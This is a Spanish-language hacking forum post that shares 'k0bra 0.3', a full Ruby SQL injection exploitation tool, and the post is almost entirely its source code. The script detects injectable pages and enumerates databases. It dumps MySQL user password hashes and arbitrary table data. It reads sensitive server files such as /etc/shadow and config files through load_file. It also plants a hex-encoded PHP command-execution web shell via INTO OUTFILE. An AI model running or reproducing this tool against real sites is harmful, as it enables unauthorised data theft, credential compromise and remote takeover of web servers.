elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Ruby] k0bra 0.3
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Ruby] k0bra 0.3  (Leído 1,889 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Ruby] k0bra 0.3
« en: 16 Febrero 2012, 18:16 pm »

Un simple scanner SQLI con las siguientes funciones


  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados
Código
  1. #!usr/bin/ruby
  2. #K0bra 0.3
  3. #Coded By Doddy H
  4.  
  5. require "net/http"
  6.  
  7. $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
  8.  
  9. def toma(web)
  10.  return Net::HTTP.get_response(URI.parse(web)).body
  11. end
  12.  
  13. def copyright()
  14.  print "\n\n(C) Doddy Hackman 2012\n\n"
  15.  gets.chomp
  16. end
  17.  
  18. def installer()
  19.  dir = Dir::pwd+"/"+"logs_webs"
  20.  if not FileTest::directory?(dir)
  21.    Dir::mkdir(dir)
  22.  end
  23. end
  24.  
  25. def encodehex(texto)
  26.  return "0x"+(texto.unpack('H*')[0])
  27. end
  28.  
  29. def savefile(file,text)
  30.  url = URI.parse(file)
  31.  save = File.open("logs_webs/"+url.host+".txt","a")
  32.  save.puts text+"\n"
  33.  save.close
  34. end
  35.  
  36. def bypass(op)
  37.  if op=="--"
  38.    return "+","--"
  39.  elsif op=="/*"
  40.   return "/**/","/**/"
  41.  elsif op=="%20"
  42.   return "%20","%00"
  43.  else
  44.   return "+","--"    
  45.  end
  46. end
  47.  
  48. def head()
  49.  
  50.  print "
  51.  
  52. @      @@   @            
  53. @@     @  @ @@            
  54. @ @@  @  @  @ @   @ @ @@@
  55. @ @   @  @  @@ @ @@@ @  @
  56. @@    @  @  @  @  @   @@@
  57. @ @   @  @  @  @  @  @  @
  58. @@@ @   @@   @@@  @@@ @@@@@
  59.  
  60. "
  61. end
  62.  
  63. def volverinicio()
  64.  print "\n\n[+] Press any key to continue\n\n"
  65.  gets.chomp
  66.  inicio()
  67. end
  68.  
  69. def clean()
  70.  if RUBY_PLATFORM=~/win/
  71.    system("cls")
  72.  else
  73.    system("clear")
  74.  end
  75. end
  76.  
  77. def retorno(url,by)
  78.  print "\n\n[+] Press any key to continue\n\n"
  79.  gets.chomp
  80.  central(url,by)
  81. end
  82.  
  83. def gettables(url,by)
  84.  pass1,pass2 = bypass(by)
  85.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  86.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  87.  print "\n\n[+] Getting tables ...\n\n"
  88.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  89.  if code1=~/K0BRA(.*?)K0BRA/
  90.    total = $1
  91.    print "[+] Tables Found : ",total,"\n\n"
  92.    savefile(url,"\n[+] Tables Found : #{total}\n")
  93.    for num in ("17"..total)
  94.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
  95.      if code2=~/K0BRA(.*?)K0BRA/
  96.        table = $1
  97.        print "[+] Table Found : "+table+"\n"
  98.        savefile(url,"[+] Table Found : #{table}")
  99.      end
  100.    end
  101.  else
  102.    print "[-] Not Found\n"
  103.  end
  104. end
  105.  
  106. def getcolumns(url,by,tablex)
  107.  tablexa = encodehex(tablex)
  108.  pass1,pass2 = bypass(by)
  109.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  110.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  111.  print "\n\n[+] Getting columns ...\n\n"
  112.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  113.  if code1=~/K0BRA(.*?)K0BRA/
  114.    total = $1
  115.    print "[+] Columns Found : ",total,"\n\n"
  116.    savefile(url,"\n[+] Table : #{tablex}")
  117.    savefile(url,"[+] Columns Found : #{total}\n")
  118.    for num in ("0"..total)
  119.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
  120.      if code2=~/K0BRA(.*?)K0BRA/
  121.        table = $1
  122.        print "[+] Column Found : "+table+"\n"
  123.        savefile(url,"[+] Column Found : #{table}")
  124.      end
  125.    end
  126.  else
  127.    print "[-] Not Found\n"
  128.  end
  129. end
  130.  
  131. def getdbs(url,by)
  132.  pass1,pass2 = bypass(by)
  133.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  134.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  135.  print "\n\n[+] Getting DBS ...\n\n"
  136.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  137.  if code1=~/K0BRA(.*?)K0BRA/
  138.    total = $1
  139.    print "[+] DBS Found : ",total,"\n\n"
  140.    savefile(url,"\n[+] DBS Found : #{total}\n")
  141.    for num in ("0"..total)
  142.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
  143.      if code2=~/K0BRA(.*?)K0BRA/
  144.        table = $1
  145.        print "[+] DB Found : "+table+"\n"
  146.        savefile(url,"[+] DB Found : #{table}")
  147.      end
  148.    end
  149.  else
  150.    print "[-] Not Found\n"
  151.  end
  152. end
  153.  
  154. def gettablesbydb(url,by,dbx)
  155.  data  = encodehex(dbx)
  156.  pass1,pass2 = bypass(by)
  157.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  158.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  159.  print "\n\n[+] Getting tables ...\n\n"
  160.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  161.  if code1=~/K0BRA(.*?)K0BRA/
  162.    total = $1
  163.    print "[+] Tables Found : ",total,"\n\n"
  164.    savefile(url,"\n[+] DBS : #{dbx}")
  165.    savefile(url,"[+] Tables Found : #{total}\n")
  166.    for num in ("0"..total)
  167.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  168.      if code2=~/K0BRA(.*?)K0BRA/
  169.        table = $1
  170.        print "[+] Table Found : "+table+"\n"
  171.        savefile(url,"[+] Table Found : #{table}")
  172.      end
  173.    end
  174.  else
  175.    print "[-] Not Found\n"
  176.  end
  177. end
  178.  
  179. def getcolumnsbydb(url,by,db,tab)
  180.  data = encodehex(db)
  181.  tabx = encodehex(tab)
  182.  
  183.  pass1,pass2 = bypass(by)
  184.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  185.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  186.  print "\n\n[+] Getting columns ...\n\n"
  187.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  188.  if code1=~/K0BRA(.*?)K0BRA/
  189.    total = $1
  190.    print "[+] Columns Found : ",total,"\n\n"
  191.    savefile(url,"\n[+] DB : #{db}")
  192.    savefile(url,"[+] Table : #{tab}")
  193.    savefile(url,"[+] Columns Found : #{total}\n")
  194.    for num in ("0"..total)
  195.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  196.      if code2=~/K0BRA(.*?)K0BRA/
  197.        table = $1
  198.        print "[+] Column Found : "+table+"\n"
  199.        savefile(url,"[+] Column Found : #{table}")
  200.      end
  201.    end
  202.  else
  203.    print "[-] Not Found\n"
  204.  end
  205. end
  206.  
  207. def mysqluser(url,by)
  208.  pass1,pass2 = bypass(by)
  209.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  210.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
  211.   print "\n\n[+] Searching mysql.user\n\n"
  212.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  213.  if code1=~/K0BRA(.*?)K0BRA/
  214.    total = $1
  215.    print "[+] Users Mysql Found : ",total,"\n\n"
  216.    savefile(url,"[+] Users Mysql Found : "+total+"\n")
  217.    for num in ("0"..total)
  218.      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
  219.      if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
  220.        host,user,passw = $1,$2,$3
  221.        print "[Host] : "+host
  222.        print " [User] : "+user
  223.        print " [Pass] : "+passw+"\n"  
  224.        savefile(url,"[Host] : "+host)
  225.        savefile(url,"[User] : "+user)
  226.        savefile(url,"[Pass] : "+passw+"\n")
  227.      end
  228.    end
  229.  else
  230.    print "[-] Not Found\n"
  231.  end
  232. end
  233.  
  234. def details(url,by)
  235.  pass1,pass2 = bypass(by)
  236.  hextest = "0x2f6574632f706173737764" #/etc/passwd
  237.  hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  238.  web1 = url.sub(/hackman/,"0x4b30425241")
  239.  web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  240.  web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
  241.   print "\n\n[+] Extrating information of the DB\n\n"
  242.  code1 = toma(web2)
  243.  if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
  244.    user,data,ver = $1,$2,$3
  245.    print "\n[+] Username : "+user
  246.    print "\n[+] Database : "+data
  247.    print "\n[+] Version : "+ver+"\n\n"
  248.    savefile(url,"\n[+] Username : "+user)
  249.    savefile(url,"[+] Database : "+data)
  250.    savefile(url,"[+] Version : "+ver+"\n")
  251.  else
  252.    print "[-] Not Found\n"
  253.  end
  254.   code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  255.   code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  256.   code4 = toma(web3)
  257.   if code2=~/K0BRA/
  258.     print "[+] Mysqluser : ON\n"
  259.     savefile(url,"[+] Mysqluser : ON")
  260.   end
  261.   if code3=~/K0BRA/
  262.     print "[+] information_schema : ON\n"
  263.     savefile(url,"[+] information_schema : ON")
  264.   end
  265.   if code4=~/ERTOR854/
  266.     print "[+] load_file : ON\n"
  267.     savefile(url,"[+] load_file : ON")
  268.   end  
  269.   savefile(url,"") #espacio en blanco
  270. end
  271.  
  272. def dumper(url,by,table,col1,col2)
  273.  pass1,pass2 = bypass(by)
  274.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  275.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  276.  print "\n\n[+] Getting Values ...\n\n"
  277.  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  278.  if code1=~/K0BRA(.*?)K0BRA/
  279.    total = $1
  280.    savefile(url,"\n[+] Table : "+table)
  281.    savefile(url,"[+] Column 1 : "+col1)
  282.    savefile(url,"[+] Column 2 : "+col2)
  283.    print "[+] Values Found : ",total,"\n\n"
  284.    savefile(url,"\n[+] Values Found : #{total}\n")
  285.    for num in ("0"..total)
  286.      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
  287.      if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
  288.        uno,dos = $1,$2
  289.        print "\n[+] "+col1+" : "+uno+"\n"
  290.        print "[+] "+col2+" : "+dos+"\n"
  291.        savefile(url,"\n[+] "+col1+" : "+uno)
  292.        savefile(url,"[+] "+col2+" : "+dos)
  293.      end
  294.    end
  295.  else
  296.    print "[-] Not Found\n"
  297.  end
  298. end
  299.  
  300. def fuzzfile(url,by)
  301.  pass1,pass2 = bypass(by)
  302.  print "\n\n[+] Fuzzing Files with load_file ....\n"
  303.  $files.each do |file|
  304.    res = file
  305.    file = file.chomp
  306.    file = encodehex(file)
  307.    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  308.    code = toma(web1)
  309.    if code=~/ERTOR854(.*?)ERTOR854/m
  310.      print "\n\n[File Found] : ",res
  311.      print "\n\n[Source Start]\n"
  312.      print $1
  313.      print "\n[Source End]"
  314.      savefile(url,"\n[File Found] : "+res)
  315.      savefile(url,"\n[Source Start]\n")
  316.      savefile(url,$1)
  317.      savefile(url,"\n[Source End]")
  318.    end    
  319.  end
  320. end
  321.  
  322. def abrirfile(url,by,file)
  323.  pass1,pass2 = bypass(by)
  324.  print "\n\n[+] Opening file ....\n"
  325.  res = file
  326.  file = encodehex(file)
  327.    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  328.    code = toma(web1)
  329.    if code=~/ERTOR854(.*?)ERTOR854/m
  330.      print "\n\n[File Found] : ",res
  331.      print "\n\n[Source Start]\n"
  332.      print $1
  333.      print "\n[Source End]"
  334.      savefile(url,"\n[File Found] : "+res)
  335.      savefile(url,"\n[Source Start]\n")
  336.      savefile(url,$1)
  337.      savefile(url,"\n[Source End]")
  338.    else
  339.      print "\n\n[-] Error\n\n"
  340.    end    
  341. end
  342.  
  343. def into(url,by,full,dir)
  344.  pass1,pass2 = bypass(by)
  345.  linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  346.  lugar = full+"/cmd.php"
  347.  lugardos = dir+"/cmd.php"
  348.  h = URI.parse(url)
  349.  webtest = "http://"+h.host+lugardos
  350.  web1 = url.sub(/hackman/,linea)
  351.  formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  352.  toma(formandoweb)
  353.  code = toma(webtest)
  354.  if code=~/Mini Shell By Doddy/
  355.    print "\n\n[shell up] : "+webtest+"\n"
  356.    savefile(url,"\n[shell up] : "+webtest+"\n")
  357.  else
  358.    print "\n\n[-] Error\n"
  359.  end
  360. end
  361.  
  362. def central(url,by)
  363.  clean()
  364.  head()
  365.  print "\n\n[+] Page : #{url}\n"
  366.  print "[+] ByPass : #{by}\n\n\n"
  367.  
  368.  print "\n[information_schema]\n\n"
  369.  print "1 - Show tables\n"
  370.  print "2 - Show columns of the a table\n"
  371.  print "3 - Show databases\n"
  372.  print "4 - Show tables from the a DB\n"
  373.  print "5 - Show columns from the a table of the DB\n"
  374.  print "\n[mysql.user]\n\n"
  375.  print "6 - Show users\n"
  376.  print "\n[Others]\n\n"
  377.  print "7 - Show details\n"
  378.  print "8 - Dump data\n"
  379.  print "9 - Fuzz Files with load_file\n"
  380.  print "10 - Load files with load_file\n"
  381.  print "11 - Create Shell\n"
  382.  print "12 - Show log\n"
  383.  print "13 - Change target\n"
  384.  print "14 - Exit\n\n"
  385.  
  386.  print "[+] Option : "
  387.  op = gets.chomp
  388.  
  389.  if op == "1"
  390.    gettables(url,by)
  391.    retorno(url,by)
  392.  elsif op == "2"
  393.    print "\n\n[+] Table : "
  394.    table = gets.chomp
  395.    getcolumns(url,by,table)
  396.    retorno(url,by)
  397.  elsif op == "3"
  398.    getdbs(url,by)
  399.    retorno(url,by)
  400.  elsif op == "4"
  401.    print "\n\n[+] DB : "
  402.    db = gets.chomp
  403.    gettablesbydb(url,by,db)
  404.    retorno(url,by)
  405.  elsif op == "5"
  406.    print "\n\n[+] DB : "
  407.    db = gets.chomp
  408.    print "\n\n[+] Table : "
  409.    tab = gets.chomp
  410.    getcolumnsbydb(url,by,db,tab)
  411.    retorno(url,by)
  412.  elsif op == "6"
  413.    mysqluser(url,by)
  414.    retorno(url,by)
  415.  elsif op == "7"
  416.    details(url,by)
  417.    retorno(url,by)
  418.  elsif op == "8"
  419.    print "\n\n[+] Table : "
  420.    table = gets.chomp
  421.    print "\n\n[+] Column 1 : "
  422.    col1 = gets.chomp
  423.    print "\n\n[+] Column 2 : "
  424.    col2 = gets.chomp
  425.    dumper(url,by,table,col1,col2)
  426.    retorno(url,by)
  427.  elsif op == "9"
  428.    fuzzfile(url,by)
  429.    retorno(url,by)
  430.  elsif op == "10"
  431.    print "\n\n[+] File : "
  432.    file = gets.chomp
  433.    abrirfile(url,by,file)
  434.    retorno(url,by)
  435.  elsif op == "11"
  436.    print "\n\n[Full Source Discloure] : "
  437.    full = gets.chomp
  438.    print "\n\n[Directory to test] : "
  439.    dir = gets.chomp
  440.    into(url,by,full,dir)
  441.    retorno(url,by)
  442.  elsif op == "12"
  443.    urla = URI.parse(url)
  444.    ar = "logs_webs/"+urla.host+".txt"
  445.    system("start #{ar}")
  446.    retorno(url,by)
  447.  elsif op == "13"
  448.    inicio()
  449.  elsif op == "14"
  450.    copyright()
  451.  else
  452.    retorno(url,by)
  453.  end
  454. end
  455.  
  456. def findlength(url,by)
  457.  pass1,pass2 = bypass(by)
  458.  z = "1"
  459.  x = "concat(0x4b30425241,1,0x4b30425241)"
  460.  for num in ('2'..'25')
  461.    z = z+","+num
  462.    x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
  463.    code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
  464.    if code=~/K0BRA(.*?)K0BRA/
  465.      print "[+] The Page has "+num+" columns\n"
  466.      print "[+] The number "+$1+" print data"
  467.      z = z.sub($1,"hackman")
  468.      sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
  469.      savefile(url,"[+] SQLI : "+sqli)
  470.      savefile(url,"[+] Bypass : "+by+"\n")
  471.      central(sqli,by)
  472.    end
  473.  end
  474. end
  475.  
  476. def testvul(page,by)
  477.  pass1,pass2 = bypass(by)
  478.  print "\n\n[+] Testing vulnerability ...\n\n"
  479.  codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  480.  codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  481.  if codeuno != codedos
  482.    print "[+] Vulnerable !\n"
  483.    findlength(page,by)
  484.  else
  485.    print "[-] Not vulnerable\n"
  486.    print "\n\n[+] Scan anyway y/n : "
  487.    op = gets.chomp
  488.    if op == "y"
  489.      findlength(page,by)
  490.  else
  491.    volverinicio()
  492.  end
  493. end  
  494. end
  495.  
  496. def inicio()
  497.  clean()
  498.  head()
  499.  print "\n\n[+] Page : "
  500.  page = gets.chomp
  501.  print "\n\n[+] Bypass : "
  502.  by = gets.chomp
  503.  if page=~/hackman/
  504.    central(page,by)
  505.  else
  506.    testvul(page,by)
  507.  end
  508. end
  509.  
  510. installer()
  511. inicio()
  512.  
  513. # The End ?
  514.  


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] K0bra 0.5
Scripting
BigBear 0 1,577 Último mensaje 10 Octubre 2011, 16:53 pm
por BigBear
[Perl] K0bra 1.5
Scripting
BigBear 0 1,293 Último mensaje 1 Diciembre 2011, 22:14 pm
por BigBear
[Python] K0bra 0.3
Scripting
BigBear 0 1,392 Último mensaje 3 Diciembre 2011, 16:35 pm
por BigBear
[Perl] K0bra 1.6
Scripting
BigBear 0 762 Último mensaje 14 Julio 2012, 19:38 pm
por BigBear
[Ruby] K0bra 0.5
Scripting
BigBear 0 913 Último mensaje 24 Julio 2015, 18:12 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines